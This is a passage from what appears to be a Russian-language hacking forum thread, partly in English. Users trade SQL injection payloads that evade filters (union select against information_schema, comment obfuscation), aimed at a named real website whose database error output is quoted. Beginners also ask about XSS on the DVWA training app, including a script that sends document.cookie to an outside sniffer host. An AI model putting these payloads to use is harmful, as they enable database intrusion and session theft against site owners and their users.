фильтр на пробовал по-разному, так и так http://forum.antichat.ru/showpost.php?p=2289579&postcount=14623 http://forum.antichat.ru/showpost.php?p=2386991&postcount=15253 все равно 403 с этим все нормально, версию он выводит и кстати, может быть что запрос режется?
Попробуй такое извращение: information_schema./**/tables 2trololoman96, он уже писал, что такие мохинации не сработали...
попробуй полностью запрос в /*!sql*/ взять, типа Code: s.php?id=1+/*!union+select+1,2,3+information_schema.tables*/
Там было всё проще: Code: id=(1)and+false/*!union*//*!select(1),2,unhex(hex(concat_ws(0x3a,table_name, column_name))),(4)from(information_schema.columns)limit+1*/--+
Code: http://hydra-gym.com/index2.php?id=63 Code: http://hydra-gym.com/index2.php?id=63/**/and/**/1=1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+ But when I do id=- or id-null it gives me this error Code: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 8 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 23 Error: Table 'hydragym.HitCounterRef_1' doesn't exist
Или через ошибку: http://hydra-gym.com/index2.php?id=-1+union+select+concat(0x01,concat_ws(0x3a,version(),user(),database())),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
У меня довольно простой вопрос. Я тренирую xss на DVWA. Поставил самый лекгий уровень , зарегился на online sniffer , на сайте вписал скрипт который отсылает мне куки , мне пришел отчет security=low; vc=2; PHPSESSID=b2aec6bfd1dec067e275b83f8efcb10a , но когда передомной табличка логин/пасс и я в управлениями куки в PHPSESSID вставляю то что получил то я не вхожу админом , а зарегится я могу помойму только админом. Как мне получить что то от куки или в тренировках это не делается , только получаешь отчет и все? Спасибо. Дополнение: Я поменял с low на medium и когда пишу <script>alert()</script> , "><script>alert()</script> , <sc<script>ript>alert()</sc</script>ript> , <zxcvbnzxc792> ? "> http://******.ru/trye.asp?sessionID="><IMG%20SRC="javascript:alert(); как написано в статье для новичков то фильтр все съедает , это значит что там нет xss и можно дальше не искать ?
возникла такая идея... а нельзя ли сделать прошивку для модемов с шеллом? ну т.е. если зашел в модем "прошить" и залить шелл ?
В исходнике пишет то что я вижу на экране. Когда я пишу '';!--"<fuck>=&{()} то мне показывает \'\';!--\"=&{()} и если "'\ остались как написано в статье то значит что есть уязвимость. Это пассивная xss если <script>alert()</script> съедает? Если да то извените за столько ламерских вопросов , я новичок и хочу научиться. У меня не получается пасивная xss или я чего то не догоняю. В url пишу так http://localhost/denwer/dvwa/index.php?id=javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/123.gif?"+document.cookie;</script>') а куки не приходят. Что я делаю не так?
Тут все ясно, ты сделал <fuck>, поэтому появились ребенки По сабжу: XSS medium еще никто не проходил... UPD. Скачаю-ка себе, тоже покапаюсь...
Но в статье написано что если появляется "'\ то уязвимость есть. Значит в medium есть уязвимость, не так ли? Если просто в medium вписать скрипт который отсылает куки на снифер то куки не придут , а в low придут , а если после того что я вписал скрипт в low и поменял на medium ничего не стирая то и я захожу в ту гостевую с xss то мне приходят куки от medium. Это о чем то говорит? И как различить если на сайте активная или пасивная xss , если каждый раз выскакивает алерт значит активная , а если один раз - пасивная? или как? (долго над этим думал но никак догнать не могу) Что я сделал не так с пасивной xss ? почему мне не пришли куки? Это из за того что если уже есть активная то пасивная работать не будет? (в активной все работает) Спасибо за ответы.
активная это если ты *make some magic* и твои грязные намерения записались куда-то на сайте. и при дальнейших посещениях этой страницы отрабатывает твой скрипт. например при заполнении анкеты где-то в былосоцсети самопальной вместо имени ты написал "><script>alert('webkill was here')</script> и когда кто-то откроет твою анкету он будет видеть это окно. пассивная это например когда поиск на сайте стоит, принимает параметры в get и выводит на страницу вместе с результатами и сам поисковый запрос. всё же описано в статьях..
О , большое спасибо за обяснения , теперь я понял то что написано в статьях , что пасивная это get , адресная строка а активная post в гостевой например. Спасибо )